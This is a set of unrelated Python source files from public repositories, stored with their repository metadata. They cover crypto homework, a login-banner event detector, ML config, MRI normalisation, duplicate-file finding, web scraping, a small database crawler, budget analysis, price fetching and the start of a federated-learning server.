{q_1}\\n')\r\nprint(f'Start k: {start_key}\\nMessage: {message}\\n')\r\n\r\n\r\nif received_key[0]:\r\n print(f'The key has been received: {received_key[1]}\\n')\r\nelse:\r\n print('Error getting the key')\r\nprint(f\"Encrypted message: {encrypted_msg}\\nDecrypted message: {decrypted_msg}\")\r\n","repo_name":"supermemez/crypto-22-23","sub_path":"cp4/semenow_chyrkov_fb-05_cp4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"}
{"seq_id":"40341652350","text":"# -*- coding: utf-8 -*-\n__author__ = 'Marcin Usielski'\n__copyright__ = 'Copyright (C) 2019, Nokia'\n__email__ = 'marcin.usielski@nokia.com'\n\nimport datetime\nimport re\n\nfrom moler.events.unix.genericunix_lineevent import GenericUnixLineEvent\n\n\nclass PrivateSystem(GenericUnixLineEvent):\n # There were 2 failed login attempts since the last successful login\n _re_warning = [\n re.compile(r\"You are about to access a private system. This system is for the use of\"),\n re.compile(r\"authorized users only. All connections are logged to the extent and by means\"),\n re.compile(r\"acceptable by the local legislation. Any unauthorized access or access\"),\n re.compile(r\"attempts may be punished to the fullest extent possible under the applicable\"),\n re.compile(r\"local legislation.\"),\n ]\n\n def __init__(self, connection, till_occurs_times=-1, runner=None):\n \"\"\"\n Event for checking failed login attempts.\n\n :param connection: moler connection to device, terminal when command is executed\n :param till_occurs_times: number of event occurrence\n :param runner: Runner to run event\n \"\"\"\n super(PrivateSystem, self).__init__(connection=connection,\n runner=runner,\n till_occurs_times=till_occurs_times,\n detect_patterns=PrivateSystem._re_warning,\n match='all')\n\n self.process_full_lines_only = True\n\n\nEVENT_OUTPUT = \"\"\"\nYou are about to access a private system. This system is for the use of\nauthorized users only. All connections are logged to the extent and by means\nacceptable by the local legislation. Any unauthorized access or access\nattempts may be punished to the fullest extent possible under the applicable\nlocal legislation.\n\"\"\"\n\nEVENT_KWARGS = {\n \"till_occurs_times\": 1\n}\nEVENT_RESULT = [\n [\n {\n 'line': 'You are about to access a private system. This system is for the use of',\n 'matched': 'You are about to access a private system. This system is for the use of',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'authorized users only. All connections are logged to the extent and by means',\n 'matched': 'authorized users only. All connections are logged to the extent and by means',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'acceptable by the local legislation. Any unauthorized access or access',\n 'matched': 'acceptable by the local legislation. 
Any unauthorized access or access',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'attempts may be punished to the fullest extent possible under the applicable',\n 'matched': 'attempts may be punished to the fullest extent possible under the applicable',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'local legislation.',\n 'matched': 'local legislation.',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n ]\n]\n","repo_name":"nokia/moler","sub_path":"moler/events/unix/private_system.py","file_name":"private_system.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"37409708372","text":"from torch.optim.lr_scheduler import StepLR\n\n\nclass StepLRParams(object):\n\n def update_config_with_suggestion(self, config, suggestion):\n \"\"\"\n Given a SigOpt suggestion, update the lr_scheduler_args with StepLR params.\n\n :param config:\n - lr_scheduler_args: dict of lr arguments\n - optimizer_args: dict of optimizer arguments\n :param suggestion:\n - assignments (all optional)\n - gamma\n - step_size\n \"\"\"\n super().update_config_with_suggestion(config, suggestion)\n\n assignments = suggestion.assignments\n\n assert \"lr_scheduler_args\" in config\n assert \"lr_scheduler_class\" in config\n\n lr_scheduler_args = config[\"lr_scheduler_args\"]\n lr_scheduler_class = config[\"lr_scheduler_class\"]\n\n assert lr_scheduler_class == StepLR\n\n # lr_scheduler args\n if \"gamma\" in assignments:\n lr_scheduler_args[\"gamma\"] = assignments[\"gamma\"]\n\n if \"step_size\" in assignments:\n lr_scheduler_args[\"step_size\"] = assignments[\"step_size\"]\n\n @classmethod\n def get_execution_order(cls):\n eo = super().get_execution_order()\n eo[\"update_config_with_suggestion\"].append(\n \"StepLRParams.update_config_with_suggestion\"\n )\n return eo\n","repo_name":"numenta/nupic.research","sub_path":"packages/sigopt/src/nupic/research/frameworks/sigopt/mixins/step_lr_params.py","file_name":"step_lr_params.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"78"} +{"seq_id":"34966246740","text":"def file_name(file_dir):\n \"\"\"循环目录,将MR的灰度值归一化到[0,255]\"\"\"\n for root, dirs, files in os.walk(file_dir): \n for path in dirs:\n end_dirs = root +'/' + path\n # 对image进行重采样\n if 'T2' in end_dirs:\n imageName = end_dirs +'/Pre_N4_resam113_MR.nii' \n image= sitk.ReadImage(imageName) \n resacleFilter = sitk.RescaleIntensityImageFilter()\n resacleFilter.SetOutputMaximum(255)\n resacleFilter.SetOutputMinimum(0)\n image = resacleFilter.Execute(image)\n sitk.WriteImage(image, end_dirs+'/Pre_N4_resam113_norm_MR.nii') \n print(imageName) \n\nfile_name('A:/BaiduNetdiskDownload/tu xiang-zhao') \n\n","repo_name":"yangyunfeng-cyber/Medical_preprocess","sub_path":"image_normalize.py","file_name":"image_normalize.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74100475450","text":"import logging\nimport argparse\nfrom pathlib import Path\nfrom .helpers import log, write_file\nfrom .dupfinder import find_duplicates, deduplicate_content\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=(\n 'Finds duplicate files based on 
their content hash. '\n 'Outputs the results to a JSON file.'\n )\n )\n parser.add_argument('directory', help='Base directory run search on')\n parser.add_argument(\n '-o', '--output',\n default='duplicates.json',\n help='Output results to a specified JSON file; default=duplicates.json'\n )\n parser.add_argument(\n '-d', '--dedup',\n action='store_true',\n help='Automatically deduplicate content. Backup is saved in \"./backup\"'\n )\n parser.add_argument(\n '-f', '--force',\n action='store_true',\n help='Force removal of files w/o making backup.'\n )\n parser.add_argument(\n '-v', '--verbose',\n action='store_true',\n help='Display verbose logs'\n )\n args = parser.parse_args()\n\n if args.verbose:\n log.setLevel(logging.DEBUG)\n log.debug('Debug mode enabled')\n\n try:\n base_dir = Path(args.directory).absolute()\n log.info('Checking files in {}'.format(base_dir))\n\n duplicates = find_duplicates(base_dir, args.verbose)\n\n if args.output:\n result_file_name = Path(args.output).absolute()\n\n log.info('Saving results to \"{}\"'.format(result_file_name))\n\n write_file(result_file_name, duplicates)\n\n if args.dedup:\n log.info('Deduplicating files...')\n backup_dir = None if args.force else './backup'\n\n if backup_dir:\n log.debug('removed duplicates will be backed up to \"./backup\"')\n deduplicate_content(duplicates, backup_dir)\n\n log.info('Done!')\n except Exception as exp:\n log.warn(exp)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yohannesHL/dupfinder","sub_path":"dupfinder/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"9206825572","text":"from argparse import ArgumentParser\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom lkmeans.clustering import assign_to_cluster\nfrom lkmeans.data_generation.points_generator import generate_mix_distribution\nfrom lkmeans.distance import pairwise_minkowski_distance\nfrom lkmeans.examples.experiment_data import get_experiment_data\n\nparser = ArgumentParser()\n\nparser.add_argument(\n '--path',\n type=Path,\n default=Path('images'),\n help='Path to save results'\n)\n\nparser.add_argument(\n '--p',\n type=float,\n default=2,\n help='Minkowski parameter'\n)\n\nparser.add_argument(\n '--t',\n type=float,\n default=0.,\n help='T parameter of distribution'\n)\n\n\n# pylint: disable=too-many-locals\ndef main():\n args = parser.parse_args()\n args.path.mkdir(exist_ok=True)\n p = int(args.p) if (args.p).is_integer() else args.p\n\n dimension = 20\n n_points = 10\n n_observation = 10000\n\n n_clusters, prob, mu_list, cov_matrices = get_experiment_data(num_clusters=2, dimension=dimension)\n\n filename = args.path / f'plot_minkowski_function_with_p_{p}.png'\n samples, _, centroids = generate_mix_distribution(\n probability=prob,\n mu_list=mu_list,\n cov_matrices=cov_matrices,\n n_samples=n_points,\n t=0.1\n )\n\n dim = 0\n\n clusters, _ = assign_to_cluster(samples, centroids, n_clusters, p)\n cluster = np.array(clusters[0])\n dimension_data = cluster[:,dim]\n\n points = np.linspace(min(dimension_data), max(dimension_data), n_observation)\n minkowski_values = pairwise_minkowski_distance(\n point_a = dimension_data,\n points=points,\n p=p\n )\n\n fig, ax = plt.subplots(figsize=(5, 3))\n ax.scatter(points, minkowski_values)\n ax.axis('off')\n fig.savefig(str(filename), dpi=300, bbox_inches='tight')\n plt.close(fig)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"alexgiving/LKMeans","sub_path":"lkmeans/report/plot_minkowski.py","file_name":"plot_minkowski.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"4627504072","text":"from selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\ndef get_chromedriver():\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(f'--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36')\n # chrome_options.add_argument('--headless')\n # chrome_options.add_argument('--proxy-server=37.233.3.100:9999')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument('--auto-open-devtools-for-tabs=devtools://devtools/bundled/inspector.html')\n\n s = Service(\n executable_path=\"C:\\\\scrap_tutorial-master\\\\chromedriver.exe\"\n )\n driver = webdriver.Chrome(\n service=s,\n options=chrome_options\n )\n\n return driver\n\ndef main():\n url = \"https://www.meetmable.com/product/801442/18-chestnuts/beetroot-apple?variant=236574\"\n\n driver = get_chromedriver()\n # Load the page\n driver.get(url)\n # Wait for the page to load\n time.sleep(5)\n # Switch to the Network tab\n driver.execute_script('''\n var elements = document.querySelectorAll('[aria-label=\"Network panel\"]');\n for (var i = 0; i < elements.length; i++) {\n var element = elements[i];\n if (element.offsetWidth > 0 && element.offsetHeight > 0) {\n element.click();\n break;\n }\n }\n ''')\n\n # Wait for the list of requests to load\n time.sleep(5)\n\n # Get the list of requests\n requests = driver.execute_script('''\n var performanceEntries = performance.getEntriesByType(\"resource\");\n var fetchRequests = [];\n for (var i=0; i < performanceEntries.length; i++) {\n var entry = performanceEntries[i];\n if (entry.initiatorType === 'fetch' || entry.initiatorType === 'xmlhttprequest') {\n fetchRequests.push(entry);\n }\n }\n return fetchRequests;\n ''')\n urls_product = []\n # Print the list of requests\n for request in requests:\n if \"https://api.meetmable.com/v1/products/\" in request['name']:\n urls_product.append(request['name'])\n print('*'*100)\n print(urls_product)\n\n\n\n\n\n\n\n\n\n\n\n\n\n \"\"\"Working version\"\"\"\n # driver.execute_script('window.open(\"devtools://devtools/bundled/inspector.html\");')\n # driver.switch_to.window(driver.window_handles[-1])\n # driver.execute_script('window.network = performance.getEntriesByType(\"resource\").map((resource) => resource.name);')\n # requests = driver.execute_script('return window.network;')\n # print(requests)\n\n\nif __name__ == '__main__':\n main()","repo_name":"SashaZt/scrap_tutorial-master","sub_path":"meetmable_com/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"75157115131","text":"l=[]\nmul=1\nn=int(input())\nlen=int(input())\nfor i in range(len):\n b=int(input())\n l=l+[b]\n mul=mul*b\nprint()\nprint(mul%n)\nprint(l)\nprint(max(l))\n\n\n\ndef ismonotronic(A):\n 
x,y=[],[]\n x.extend(A)\n y.extend(A)\n x.sort()\n y.sort(reverse=True)\n if(x==A or y==A):\n return True\n return False\nA=[4,9,6,8]\nprint(ismonotronic(A))\n\n\n ","repo_name":"amru1234/code-python","sub_path":"python/Pra.py","file_name":"Pra.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26305113925","text":"import os\nimport sys\nfrom time import time\nimport statistics\n\nmyPath = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, myPath + '/../')\n\nfrom graph.Graph import Graph\nfrom algorithms.quinca import *\nfrom algorithms.abm import *\nfrom algorithms.floyd_warshall import *\nfrom algorithms.eg import *\n\n\n## Data graph\nrepetitions = 10\nnum_nodes = 300\nnum_nodes_max = 301\nprobability_edges = 0.4\nmultliplicador = 1000\n\n\n\nfor num_notes_current in range(num_nodes, num_nodes_max):\n\n print(\"----------------------------------------------\")\n print(\"Nodes: \", num_notes_current)\n\n time_list_abm = []\n for i in range(repetitions):\n graph2 = Graph.creategraph(num_notes_current, probability_edges)\n result_before_dist2 = np.array(Floyd_Warshall(graph2))\n graph2.insert_worst_edge()\n\n ## Warm\n for i in range(5):\n dist111 = Quinca(graph2, result_before_dist2)\n dist1112 = ABM_Update(graph2, result_before_dist2)\n dist1113 = Even_Gazit(graph2, result_before_dist2)\n\n t2 = time()\n dist2 = ABM_Update(graph2, result_before_dist2)\n time_miliseconds2 = (time() - t2) * multliplicador\n time_list_abm.append(time_miliseconds2)\n print(\"abm: \", time_miliseconds2)\n\n print(\"==========ABM: \", statistics.mean(time_list_abm))\n\n ## QUINCA\n\n time_list_quinca = []\n for i in range(repetitions):\n graph = Graph.creategraph(num_notes_current, probability_edges)\n result_before_dist = np.array(Floyd_Warshall(graph))\n graph.insert_worst_edge()\n\n ## Warm\n for i in range(5):\n dist111 = Quinca(graph, result_before_dist)\n dist1112 = ABM_Update(graph, result_before_dist)\n dist1113 = Even_Gazit(graph, result_before_dist)\n\n t = time()\n dist = Quinca(graph, result_before_dist)\n time_miliseconds = (time() - t) * multliplicador\n time_list_quinca.append(time_miliseconds)\n print(\"Quinca: \", time_miliseconds)\n\n print(\"=======QUINCA: \", statistics.mean(time_list_quinca))\n\n\n time_list_eg = []\n for i in range(repetitions):\n graph3 = Graph.creategraph(num_notes_current, probability_edges)\n result_before_dist3 = np.array(Floyd_Warshall(graph3))\n graph3.insert_worst_edge()\n\n ## Warm\n for i in range(5):\n dist111 = Quinca(graph3, result_before_dist3)\n dist1112 = ABM_Update(graph3, result_before_dist3)\n dist1113 = Even_Gazit(graph3, result_before_dist3)\n\n t = time()\n dist = Even_Gazit(graph3, result_before_dist3)\n time_miliseconds3 = (time() - t) * multliplicador\n print(\"EG: \", time_miliseconds3)\n time_list_eg.append(time_miliseconds3)\n\n print(\"========EG: \", statistics.mean(time_list_eg))\n","repo_name":"arturoverbel/graph_presentation","sub_path":"scripts/quinca_vs_abm_strong.py","file_name":"quinca_vs_abm_strong.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"34236678460","text":"'''\nCreated on 17 févr. 
2020\n\n@author: Fab\n'''\nfrom LMT.USV2.lib.USVUtil import sortVocInTime\nfrom LMT.USV2.lib.USVBurst import USVBurst\n\n\n\n\n'''\nThe burster creates bursts from vocs.\nIt takes a vocEventList as input, and then creates bursts.\n'''\n\n\ndef createBurstFromVoc( eventTimeLineVoc, silenceBetweenBurstMs = 750 ):\n \n sortVocInTime( eventTimeLineVoc )\n \n burstList = []\n \n currentBurst = None\n \n for vocEvent in eventTimeLineVoc.eventList:\n \n if currentBurst != None: \n #rationale behind the division by 33: the difference between endFrame and startFrame is in frames, so the silenceBetweenBurstMs\n #should be converted into frames, and one frame lasts 33 ms\n if vocEvent.startFrame - currentBurst.getEndFrame() < silenceBetweenBurstMs/33:\n currentBurst.vocEventList.append( vocEvent )\n continue\n else:\n #burstList.append( currentBurst )\n currentBurst = None\n \n if currentBurst == None:\n \n currentBurst = USVBurst()\n burstList.append( currentBurst )\n currentBurst.vocEventList.append( vocEvent ) \n continue\n \n # indexing voc in burst:\n burstNumber = 0\n for burst in burstList:\n vocNumber=0\n for voc in burst.vocEventList:\n voc.metadata[\"vocNumber\"]= vocNumber\n voc.metadata[\"burstNumber\"]= burstNumber \n vocNumber+=1\n burstNumber+=1\n \n return burstList\n\n\nif __name__ == '__main__':\n \n pass\n ","repo_name":"fdechaumont/LMT-USV-Toolbox","sub_path":"LMT/USV2/lib/burster.py","file_name":"burster.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"}
{"seq_id":"5044750100","text":"import requests\nimport pandas as pd\nfrom utils.python_utils import str_to_dict\nfrom utils.yaml_utils import *\nfrom utils.colors import *\n\nURL_BASE = yaml_to_dict('ressources/path.yaml')\n\n\nclass Coin:\n def __init__(self, coin:str, hours=4):\n self.coin = coin\n self.hours = hours\n\n def get_price(self):\n currency = 'USDT'\n price = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/ticker/price?symbol={self.coin.upper()}{currency}')\n dic = str_to_dict(price.text)\n print(f\"{bcolors.BOLD}{self.coin}{bcolors.ENDC} ACTUAL PRICE :{bcolors.YELLOW} {dic['price']} {currency}\")\n return price\n\n def get_df(self, period=0, daily=False):\n if daily:\n r = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/klines?symbol=BTCUSDT&interval={self.hours}d')\n else:\n if self.coin == 'BTC':\n r = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/klines?symbol=BTCUSDT&interval={self.hours}h')\n else:\n r = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/klines?symbol={self.coin.upper()}USDT&interval={self.hours}h')\n json_response = r.json()\n df = pd.DataFrame.from_dict(json_response)\n headers = ['OPEN_TIME', 'OPEN', 'HIGH', 'LOW', 'CLOSE', 'VOLUME', 'CLOSE_TIME', 'QUOTE_ASSET_VOLUME', 'NB_OF_TRADES', 'TAKER_BUY_BASE_ASSET_VOLUME', 'TAKER_BUY_QUOTE_ASSET_VOLUME', 'IGNORE']\n df.set_axis(headers, axis=1, inplace=True)\n return df[500-period:]\n\nif __name__ == '__main__':\n info = Coin('BTC')\n info.get_price()\n print(info.get_df().head())","repo_name":"KevTeng/Coin_tracker","sub_path":"indicators/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"73476602812","text":"import os\nimport csv\n\nbudget_data=os.path.join(\"budget_data.csv\")\n\ntotal_months = []\ntotal_PL = []\nmonthly_PL_change = []\n \nwith open(budget_data, newline='') as csvfile:\n\n csvreader = 
csv.reader(csvfile,delimiter=\",\") \n header = next(csvreader) \n\n for row in csvreader: \n total_months.append(row[0])\n total_PL.append(int(row[1]))\n\n for i in range(len(total_PL)-1):\n monthly_PL_change.append(total_PL[i+1]-total_PL[i])\n \nmax_increase_value = max(monthly_PL_change)\nmax_decrease_value = min(monthly_PL_change)\n\nmax_increase_month = monthly_PL_change.index(max(monthly_PL_change)) + 1\nmax_decrease_month = monthly_PL_change.index(min(monthly_PL_change)) + 1 \n\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {len(total_months)}\")\nprint(f\"Total: ${sum(total_PL)}\")\nprint(f\"Average Change: ${round(sum(monthly_PL_change)/len(monthly_PL_change),2)}\")\nprint(f\"Greatest Increase in Profits: {total_months[max_increase_month]} (${(str(max_increase_value))})\")\nprint(f\"Greatest Decrease in Profits: {total_months[max_decrease_month]} (${(str(max_decrease_value))})\")\n\nwrite_file = f\"pybank_analysis.txt\"\n\nfilewriter = open(write_file, mode = 'w')\n\nfilewriter.write(\"Financial Analysis\\n\")\nfilewriter.write(\"--------------------------\\n\")\nfilewriter.write(f\"Total Months: {len(total_months)}\\n\")\nfilewriter.write(f\"Total: ${sum(total_PL)}\\n\")\nfilewriter.write(f\"Average Change:${round(sum(monthly_PL_change)/len(monthly_PL_change),2)}\\n\")\nfilewriter.write(f\"Greatest Increase in Profits: {total_months[max_increase_month]} (${(str(max_increase_value))})\\n\")\nfilewriter.write(f\"Greatest Decrease in Profits: {total_months[max_decrease_month]} (${(str(max_decrease_value))})\\n\")\nfilewriter.close()","repo_name":"ginak329/python-challenge","sub_path":"pybank.py","file_name":"pybank.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74518118010","text":"# Given an array of numbers nums, in which exactly two elements appear only once and all the other elements appear exactly twice. 
Find the two elements that appear only once.\nimport unittest\n\nclass test(unittest.TestCase):\n def test1(self):\n self.assertEqual(\n singleNumber([1,2,1,3,2,5]),\n [3,5]\n )\n\ndef singleNumber(nums):\n hist = {}\n result = []\n \n for i in range(len(nums)):\n if nums[i] in hist:\n hist[nums[i]] += 1\n else:\n hist[nums[i]] = 1\n \n for k, v in hist.items():\n if v == 1:\n result.append(k)\n \n return result\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"cliffpham/algos_data_structures","sub_path":"algos/loops/single_number_III.py","file_name":"single_number_III.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"69943146171","text":"#from urllib.request import urlretrieve\n#from urllib.request import urlopen\n#from bs4 import BeautifulSoup\n\n#html = urlopen(\"http://www.pythonscraping.com\")\n#bsObj = BeautifulSoup(html)\n#imageLocation = bsObj.find(\"a\", {\"id\": \"logo\"}).find(\"img\")[\"src\"]\n#urlretrieve (imageLocation, \"logo.jpg\")\n\n\n#import os\n#import re\n#from urllib.request import urlretrieve\n#from urllib.request import urlopen\n#from bs4 import BeautifulSoup\n\n#downloadDirectory = \"downloaded\"\n#baseUrl = \"http://pythonscraping.com\"\n\n#def getAbsoluteURL(baseUrl, source):\n# if source.startswith(\"http://www.\"):\n# url = \"http://\"+source[11:]\n# elif source.startswith(\"http://\"):\n# url = source\n# elif source.startswith(\"www.\"):\n# url = source[4:]\n# url = \"http://\"+source\n# else:\n# url = baseUrl+\"/\"+source\n# if baseUrl not in url:\n# return None\n# return url\n\n#def getDownloadPath(baseUrl, absoluteUrl, downloadDirectory):\n# path = absoluteUrl.replace(\"www.\", \"\")\n# path = path.replace(baseUrl, \"\")\n# path = re.sub(\"\\?.*\", \"\", path) # strip everything from the question mark onward\n# path = downloadDirectory+path\n# directory = os.path.dirname(path)\n# if not os.path.exists(directory):\n# os.makedirs(directory)\n# return path\n\n#html = urlopen(\"http://www.pythonscraping.com\")\n#bsObj = BeautifulSoup(html)\n#downloadList = bsObj.findAll(src=True)\n#for download in downloadList:\n# fileUrl = getAbsoluteURL(baseUrl, download[\"src\"])\n# if fileUrl is not None:\n# print(fileUrl)\n# try:\n# urlretrieve(fileUrl, getDownloadPath(baseUrl, fileUrl, downloadDirectory))\n# except urlopen.urllib.request.ContentTooShortError:\n# print\n# 'Network conditions is not good.Reloading.'\n# #urlretrieve(fileUrl, getDownloadPath(baseUrl, fileUrl, downloadDirectory))\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\nimport pymysql\n\nconn = pymysql.connect(host='192.168.9.109', unix_socket='/tmp/mysql.sock',user='root', passwd='root', db='python', charset='utf8')\ncur = conn.cursor()\n\ndef store(title, content):\n cur.execute(\"USE python\")\n cur.execute(\"INSERT INTO pages (title, content) VALUES (\\\"%s\\\",\\\"%s\\\")\", (title, content))\n random.seed(datetime.datetime.now())\n cur.connection.commit()\n\ndef getLinks(articleUrl):\n html = urlopen(\"http://en.wikipedia.org\"+articleUrl)\n bsObj = BeautifulSoup(html)\n title = bsObj.find(\"h1\").get_text()\n content = bsObj.find(\"div\", {\"id\":\"mw-content-text\"}).find(\"p\").get_text()\n store(title, content)\n return bsObj.find(\"div\", {\"id\":\"bodyContent\"}).findAll(\"a\",href=re.compile(\"^(/wiki/)((?!:).)*$\"))\n\nlinks = getLinks(\"/wiki/Kevin_Bacon\")\ntry:\n while len(links) > 0:\n newArticle = links[random.randint(0, 
len(links)-1)].attrs[\"href\"]\n print(newArticle)\n links = getLinks(newArticle)\nfinally:\n cur.close()\n conn.close()","repo_name":"yxdongshine/depthLearning","sub_path":"com/yxd/crawler/dbIntoBase.py","file_name":"dbIntoBase.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27118846928","text":"# -*- coding: utf-8 -*-\n# (c) 2020-2022 Martin Wendt and contributors; see https://github.com/mar10/yabs\n# Licensed under the MIT license: https://www.opensource.org/licenses/mit-license.php\n\"\"\"\n\"\"\"\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\n\nimport click\nfrom jinja2 import Environment, PackageLoader, select_autoescape\n\nfrom .util import datetime_to_iso\n\n\ndef handle_init_command(parser: ArgumentParser, args: Namespace):\n res = run(parser, args)\n return res\n\n\ndef run(parser: ArgumentParser, args: Namespace):\n\n target = Path(args.filename)\n # target = Path(\".\") / \"new-yabs.yaml\"\n target = target.absolute()\n if not target.suffix:\n target = target.with_suffix(\".yaml\")\n if target.suffix != \".yaml\":\n raise click.BadArgumentUsage(f\"Expected `.yaml` extension: {target}\")\n if target.exists():\n click.confirm(f\"Overwrite {target} ?\", abort=True)\n else:\n click.echo(f\"Creating {target}...\")\n\n full_repo_name = click.prompt(\"GitHub Repo name (format: USER/PROJECT)\", type=str)\n if full_repo_name.count(\"/\") != 1:\n raise click.BadParameter(full_repo_name)\n\n github_token_env_name = click.prompt(\n \"GitHub OAUTH token environment variable\", default=\"GITHUB_OAUTH_TOKEN\"\n )\n\n context = {\n \"date\": datetime_to_iso(),\n \"full_repo_name\": full_repo_name,\n \"github_token_env_name\": github_token_env_name,\n }\n file_type = click.prompt(\n \"Type\",\n type=click.Choice({\"full\", \"compact\"}),\n default=\"full\",\n )\n click.confirm(f\"Create {target} ?\", abort=True, default=True)\n\n _copy_template(f\"yabs-{file_type}.yaml\", target, context)\n\n\ndef _copy_template(tmpl_name: str, target: Path, ctx: dict) -> None:\n env = Environment(\n loader=PackageLoader(\"yabs\"), # defaults to 'templates' folder\n autoescape=select_autoescape(),\n )\n template = env.get_template(tmpl_name)\n expanded = template.render(**ctx)\n # logger.info(\"Writing {:,} bytes to {!r}...\".format(len(tmpl), target_path))\n with target.open(\"wt\") as fp:\n fp.write(expanded)\n return\n","repo_name":"mar10/yabs","sub_path":"yabs/cmd_init.py","file_name":"cmd_init.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"8460907404","text":"import torch\nimport os\nimport numpy as np\nimport h5py\nimport copy\nimport time\nimport random\n\n\nclass Server(object):\n def __init__(self, dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,\n num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal, \n time_threthold):\n # Set up the main attributes\n self.dataset = dataset\n self.global_rounds = global_rounds\n self.local_steps = local_steps\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.global_model = copy.deepcopy(model)\n self.join_clients = join_clients\n self.num_clients = num_clients\n self.algorithm = algorithm\n self.time_select = time_select\n self.goal = goal\n self.time_threthold = time_threthold\n\n self.clients = []\n 
self.selected_clients = []\n self.train_slow_clients = []\n self.send_slow_clients = []\n\n self.uploaded_weights = []\n self.uploaded_models = []\n\n self.rs_train_acc = []\n self.rs_train_loss = []\n self.rs_test_acc = []\n\n self.times = times\n self.eval_gap = eval_gap\n self.client_drop_rate = client_drop_rate\n self.train_slow_rate = train_slow_rate\n self.send_slow_rate = send_slow_rate\n self.timestamp = None\n\n # random select slow clients\n def select_slow_clients(self, slow_rate):\n slow_clients = [False for i in range(self.num_clients)]\n idx = [i for i in range(self.num_clients)]\n idx_ = np.random.choice(idx, int(slow_rate * self.num_clients))\n for i in idx_:\n slow_clients[i] = True\n\n return slow_clients\n\n def set_slow_clients(self):\n self.train_slow_clients = self.select_slow_clients(\n self.train_slow_rate)\n self.send_slow_clients = self.select_slow_clients(\n self.send_slow_rate)\n\n def select_clients(self):\n selected_clients = []\n if self.time_select:\n clients_info = []\n for i, client in enumerate(self.clients):\n clients_info.append(\n (i, client.train_time_cost['total_cost'] + client.send_time_cost['total_cost']))\n clients_info = sorted(clients_info, key=lambda x: x[1])\n left_idx = np.random.randint(\n 0, self.num_clients - self.join_clients)\n selected_clients = [self.clients[clients_info[i][0]]\n for i in range(left_idx, left_idx + self.join_clients)]\n else:\n selected_clients = list(np.random.choice(self.clients, self.join_clients, replace=False))\n\n return selected_clients\n\n def send_models(self):\n assert (len(self.clients) > 0)\n\n for client in self.clients:\n start_time = time.time()\n\n if client.send_slow:\n time.sleep(0.1 * np.abs(np.random.rand()))\n\n client.set_parameters(copy.deepcopy(self.global_model))\n\n client.send_time_cost['num_rounds'] += 1\n 